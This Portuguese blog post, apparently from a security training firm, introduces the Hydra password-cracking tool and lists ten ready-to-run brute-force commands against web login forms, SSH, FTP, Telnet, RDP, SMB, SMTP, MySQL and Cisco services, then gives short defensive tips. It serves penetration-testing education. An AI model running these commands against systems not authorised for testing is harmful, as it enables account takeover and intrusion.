Hydra é uma ferramenta de força bruta que ajuda testadores de penetração e hackers éticos a quebrar senhas de serviços de rede.

Hydra pode executar ataques rápidos de dicionário contra mais de 50 protocolos. Isso inclui telnet, FTP, HTTP, HTTPS, SMB, bancos de dados e vários outros serviços.

Hydra foi desenvolvido pelo grupo de hackers “The Hacker’s Choice”. E foi lançado pela primeira vez em 2000 como uma ferramenta de prova de conceito que demonstrou como você pode executar ataques em serviços de logon de rede.

Hydra também é um cracker de login paralelizado. Isso significa que você pode ter mais de uma conexão em paralelo. Ao contrário do forçamento bruto sequencial, isso reduz o tempo necessário para quebrar uma senha.

Neste artigo, veremos 10 comandos para testes de invasão (credenciais) Hydra que todo profissional da área deve conhecer.

10 Comandos para Testes de Invasão (Credenciais) Hydra

1. HTTP POST Form – Este comando tenta encontrar senhas para um formulário de login na web que usa o método POST >> hydra -l user-p passlist.txt mywebsite.com http-post-form http-post-form http-post-form “/login:username=^USER^&password=^PASS^:F=incorrect” – V

2. SSH – Este comando tenta descobrir a senha de um usuário (neste caso, o usuário root) em um serviço SSH >> hydra -l root -P passlist.txt ssh://192.168.0.1

3. FTP – Semelhante ao comando SSH, este comando busca descobrir a senha de um usuário em um servidor FTP >> hydra -l user -P passlist.txt ftp://192.168.0.1

4. Telnet – Este comando usa listas de nomes de usuários e senhas. >> hydra -L userlist.txt -P passlist.txt telnet://192.168.0.1

5. Windows Remote Desktop (RDP) – Este comando é usado para encontrar a senha do usuário ‘administrator’ para um serviço de Desktop Remoto do Windows >> hydra -t 1 – V -f -l administrator -P passlist.txt rdp://192.168.0.1

6. SMB – hydra -l administrator -P passlist.txt smb://192.168.0.1

7. E-mail (SMTP) – hydra -P passlist.txt -l [email protected] smtp://smtp.example.com

8. Database (MySQL) – hydra -l root -P passlist.txt mysql://192.168.0.1

9. Cisco Auth – hydra -P passlist.txt -v -f 192.168.0.1 cisco -t 4

10. HTTP GET – Este comando é usado para tentar acessar uma área restrita de um site >> hydra -L userlist.txt -P passlist.txt mywebsite.com http-get /admin

Orientações Gerais

• Implemente políticas de senhas fortes
• Ative a autenticação de dois fatores (2FA)
• Limitação de tentativas de login
• Monitore e analise logs de acesso
• E outras medidas.

Confira também:  10 Ferramentas Pentest para Cibersegurança

Gostou do conteúdo? Se você deseja aprofundar mais seu conhecimento sobre testes de invasão, confira o Curso Pentest Avançado na Prática da IBSEC.

CONFIRA TAMBÉM:

• 
  19.09.2024 | Carreiras em Cibersegurança

  Vulnerabilidade CVE-2024-38367 afeta sistemas macOS, permitindo sequestro de sessão

  Dispositivos Apple rodando macOS são os afetados, especialmente computadores MacBook e iMac. A vulnerabilidade impacta aplicativos que utilizam CocoaPods, uma ferramenta amplamente usada no desenvolvimento de software para macOS. A CVE-2024-38367 permite o sequestro de sessão […]

• 
  18.09.2024 | Carreiras em Cibersegurança

  10 Práticas Essenciais para Fortalecer a Segurança de Dados em Ambientes AWS

  Você sabia que 79% das empresas já sofreram pelo menos um incidente de segurança na nuvem? Em um mundo onde os dados são o novo petróleo, proteger informações sensíveis em ambientes cloud tornou-se uma prioridade crítica […]